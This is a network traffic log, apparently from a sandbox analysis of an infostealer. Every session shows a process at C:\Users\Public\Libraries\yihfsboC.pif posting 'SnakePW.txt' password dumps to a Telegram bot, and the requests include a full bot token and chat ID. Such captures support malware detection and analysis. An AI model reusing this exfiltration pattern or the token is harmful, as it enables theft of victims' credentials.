2024-11-26 07:25:46 UTC  334  OUT  POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------------8dd0e6f6632ec55
Host: api.telegram.org
Content-Length: 537
2024-11-26 07:25:46 UTC  537  OUT
Data Ascii: --------------------------8dd0e6f6632ec55Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 02:25:04Client
2024-11-26 07:25:46 UTC  388  IN  HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Tue, 26 Nov 2024 07:25:46 GMT
Content-Type: application/json
Content-Length: 521
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-11-26 07:25:46 UTC  521  IN
Data Ascii: {"ok":true,"result":{"message_id":388898,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605946,"documen


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
31          192.168.2.7  49850        149.154.167.220  443               7924  C:\Users\Public\Libraries\yihfsboC.pif
Timestamp  Bytes transferred  Direction  Data
2024-11-26 07:25:47 UTC  334  OUT  POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------------8dd0e633f512fcf
Host: api.telegram.org
Content-Length: 537
2024-11-26 07:25:47 UTC  537  OUT
Data Ascii: --------------------------8dd0e633f512fcfContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 04:03:12Client
2024-11-26 07:25:48 UTC  388  IN  HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Tue, 26 Nov 2024 07:25:48 GMT
Content-Type: application/json
Content-Length: 521
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-11-26 07:25:48 UTC  521  IN
Data Ascii: {"ok":true,"result":{"message_id":388900,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605948,"documen


                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                32 | 192.168.2.7 | 49854 | 149.154.167.220 | 443 | 7240 | C:\Users\Public\Libraries\yihfsboC.pif
                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                2024-11-26 07:25:48 UTC | 334 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd0efa41ff69d7
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
                                                                                                                2024-11-26 07:25:48 UTC | 537 | OUT | Data Ascii: --------------------------8dd0efa41ff69d7Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 02:24:52Client
                                                                                                                2024-11-26 07:25:49 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:25:48 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2024-11-26 07:25:49 UTC | 521 | IN | Data Ascii: {"ok":true,"result":{"message_id":388902,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605948,"documen


                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                33 | 192.168.2.7 | 49855 | 149.154.167.220 | 443 | 7660 | C:\Users\Public\Libraries\yihfsboC.pif
                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                2024-11-26 07:25:48 UTC | 334 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd0e867d773907
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
                                                                                                                2024-11-26 07:25:48 UTC | 537 | OUT | Data Ascii: --------------------------8dd0e867d773907Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 02:25:04Client
                                                                                                                2024-11-26 07:25:49 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:25:48 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2024-11-26 07:25:49 UTC | 521 | IN | Data Ascii: {"ok":true,"result":{"message_id":388903,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605948,"documen


                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                34 | 192.168.2.7 | 49858 | 149.154.167.220 | 443 | 7924 | C:\Users\Public\Libraries\yihfsboC.pif
                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                2024-11-26 07:25:49 UTC | 334 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd0e7d2eac84a9
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
                                                                                                                2024-11-26 07:25:49 UTC | 537 | OUT | Data Ascii: --------------------------8dd0e7d2eac84a9Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 04:03:12Client
                                                                                                                2024-11-26 07:25:50 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:25:50 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2024-11-26 07:25:50 UTC | 521 | IN | Data Ascii: {"ok":true,"result":{"message_id":388906,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605950,"documen


                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                35 | 192.168.2.7 | 49864 | 149.154.167.220 | 443 | 7660 | C:\Users\Public\Libraries\yihfsboC.pif
                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                2024-11-26 07:25:50 UTC | 334 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd0ea18e3d18a2
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
                                                                                                                2024-11-26 07:25:50 UTC | 537 | OUT | Data Ascii: --------------------------8dd0ea18e3d18a2Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 02:25:04Client
                                                                                                                2024-11-26 07:25:51 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:25:50 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2024-11-26 07:25:51 UTC | 521 | IN | Data Ascii: {"ok":true,"result":{"message_id":388908,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605950,"documen


                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                36 | 192.168.2.7 | 49863 | 149.154.167.220 | 443 | 7240 | C:\Users\Public\Libraries\yihfsboC.pif
                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                2024-11-26 07:25:50 UTC | 334 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd0f14dc5e3fef
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
                                                                                                                2024-11-26 07:25:50 UTC | 537 | OUT | Data Ascii: --------------------------8dd0f14dc5e3fefContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 02:24:52Client
                                                                                                                2024-11-26 07:25:51 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:25:50 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2024-11-26 07:25:51 UTC | 521 | IN | Data Ascii: {"ok":true,"result":{"message_id":388909,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605950,"documen


                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                37 | 192.168.2.7 | 49867 | 149.154.167.220 | 443 | 7924 | C:\Users\Public\Libraries\yihfsboC.pif
                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                2024-11-26 07:25:51 UTC | 334 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd0e97064f676e
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
                                                                                                                2024-11-26 07:25:51 UTC | 537 | OUT | Data Ascii: --------------------------8dd0e97064f676eContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 04:03:12Client
                                                                                                                2024-11-26 07:25:52 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:25:52 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 523
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2024-11-26 07:25:52 UTC | 523 | IN | Data Ascii: {"ok":true,"result":{"message_id":388911,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605952,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
38 | 192.168.2.7 | 49868 | 149.154.167.220 | 443 | 7660 | C:\Users\Public\Libraries\yihfsboC.pif
Timestamp | Bytes transferred | Direction | Data
2024-11-26 07:25:52 UTC | 334 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------------8dd0eb3179c3f7f
Host: api.telegram.org
Content-Length: 537
2024-11-26 07:25:52 UTC | 537 | OUT | Data Ascii: --------------------------8dd0eb3179c3f7fContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 02:25:04Client
2024-11-26 07:25:53 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Tue, 26 Nov 2024 07:25:52 GMT
Content-Type: application/json
Content-Length: 523
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-11-26 07:25:53 UTC | 523 | IN | Data Ascii: {"ok":true,"result":{"message_id":388913,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605952,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
39 | 192.168.2.7 | 49870 | 149.154.167.220 | 443 | 7240 | C:\Users\Public\Libraries\yihfsboC.pif
Timestamp | Bytes transferred | Direction | Data
2024-11-26 07:25:52 UTC | 334 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------------8dd0f28be95a5fb
Host: api.telegram.org
Content-Length: 537
2024-11-26 07:25:52 UTC | 537 | OUT | Data Ascii: --------------------------8dd0f28be95a5fbContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 02:24:52Client
2024-11-26 07:25:53 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Tue, 26 Nov 2024 07:25:53 GMT
Content-Type: application/json
Content-Length: 523
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-11-26 07:25:53 UTC | 523 | IN | Data Ascii: {"ok":true,"result":{"message_id":388915,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605952,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
40 | 192.168.2.7 | 49876 | 149.154.167.220 | 443 | 7924 | C:\Users\Public\Libraries\yihfsboC.pif
Timestamp | Bytes transferred | Direction | Data
2024-11-26 07:25:53 UTC | 334 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------------8dd0eab5a499b52
Host: api.telegram.org
Content-Length: 537
2024-11-26 07:25:53 UTC | 537 | OUT | Data Ascii: --------------------------8dd0eab5a499b52Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 04:03:12Client
2024-11-26 07:25:54 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Tue, 26 Nov 2024 07:25:54 GMT
Content-Type: application/json
Content-Length: 521
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-11-26 07:25:54 UTC | 521 | IN | Data Ascii: {"ok":true,"result":{"message_id":388918,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605954,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
41 | 192.168.2.7 | 49877 | 149.154.167.220 | 443 | 7660 | C:\Users\Public\Libraries\yihfsboC.pif
Timestamp | Bytes transferred | Direction | Data
2024-11-26 07:25:54 UTC | 334 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------------8dd0ec9f12dbdf1
Host: api.telegram.org
Content-Length: 537
2024-11-26 07:25:54 UTC | 537 | OUT | Data Ascii: --------------------------8dd0ec9f12dbdf1Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 02:25:04Client
2024-11-26 07:25:55 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Tue, 26 Nov 2024 07:25:55 GMT
Content-Type: application/json
Content-Length: 521
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-11-26 07:25:55 UTC | 521 | IN | Data Ascii: {"ok":true,"result":{"message_id":388922,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605955,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
42 | 192.168.2.7 | 49878 | 149.154.167.220 | 443 | 7240 | C:\Users\Public\Libraries\yihfsboC.pif
Timestamp | Bytes transferred | Direction | Data
2024-11-26 07:25:54 UTC | 334 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------------8dd0f4082f33a4c
Host: api.telegram.org
Content-Length: 537
2024-11-26 07:25:54 UTC | 537 | OUT | Data Ascii: --------------------------8dd0f4082f33a4cContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 02:24:52Client
2024-11-26 07:25:55 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Tue, 26 Nov 2024 07:25:54 GMT
Content-Type: application/json
Content-Length: 521
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-11-26 07:25:55 UTC | 521 | IN | Data Ascii: {"ok":true,"result":{"message_id":388920,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605954,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
43 | 192.168.2.7 | 49884 | 149.154.167.220 | 443 | 7924 | C:\Users\Public\Libraries\yihfsboC.pif
Timestamp | Bytes transferred | Direction | Data
2024-11-26 07:25:56 UTC | 358 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------------8dd0ec250d2c789
Host: api.telegram.org
Content-Length: 537
Connection: Keep-Alive
2024-11-26 07:25:56 UTC | 537 | OUT | Data Ascii: --------------------------8dd0ec250d2c789Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 04:03:12Client
2024-11-26 07:25:59 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Tue, 26 Nov 2024 07:25:59 GMT
Content-Type: application/json
Content-Length: 523
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-11-26 07:25:59 UTC | 523 | IN | Data Ascii: {"ok":true,"result":{"message_id":388924,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605959,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
44 | 192.168.2.7 | 49886 | 149.154.167.220 | 443 | 7240 | C:\Users\Public\Libraries\yihfsboC.pif
Timestamp | Bytes transferred | Direction | Data
2024-11-26 07:25:56 UTC | 334 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd0f519f0d5ca3
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
2024-11-26 07:25:56 UTC | 537 | OUT
                                                                                                                Data Ascii: --------------------------8dd0f519f0d5ca3Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 02:24:52Client
2024-11-26 07:25:59 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:25:59 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-11-26 07:25:59 UTC | 521 | IN
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":388926,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605959,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
45 | 192.168.2.7 | 49887 | 149.154.167.220 | 443 | 7660 | C:\Users\Public\Libraries\yihfsboC.pif
Timestamp | Bytes transferred | Direction | Data
2024-11-26 07:25:56 UTC | 334 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd0ede0895058a
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
2024-11-26 07:25:56 UTC | 537 | OUT
                                                                                                                Data Ascii: --------------------------8dd0ede0895058aContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 02:25:04Client
2024-11-26 07:25:59 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:25:59 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 523
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-11-26 07:25:59 UTC | 523 | IN
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":388925,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605959,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
46 | 192.168.2.7 | 49898 | 149.154.167.220 | 443 | 7660 | C:\Users\Public\Libraries\yihfsboC.pif
Timestamp | Bytes transferred | Direction | Data
2024-11-26 07:26:00 UTC | 334 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd0f08a8cc2626
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
2024-11-26 07:26:00 UTC | 537 | OUT
                                                                                                                Data Ascii: --------------------------8dd0f08a8cc2626Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 02:25:04Client
2024-11-26 07:26:01 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:26:01 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 523
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-11-26 07:26:01 UTC | 523 | IN
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":388929,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605961,"documen


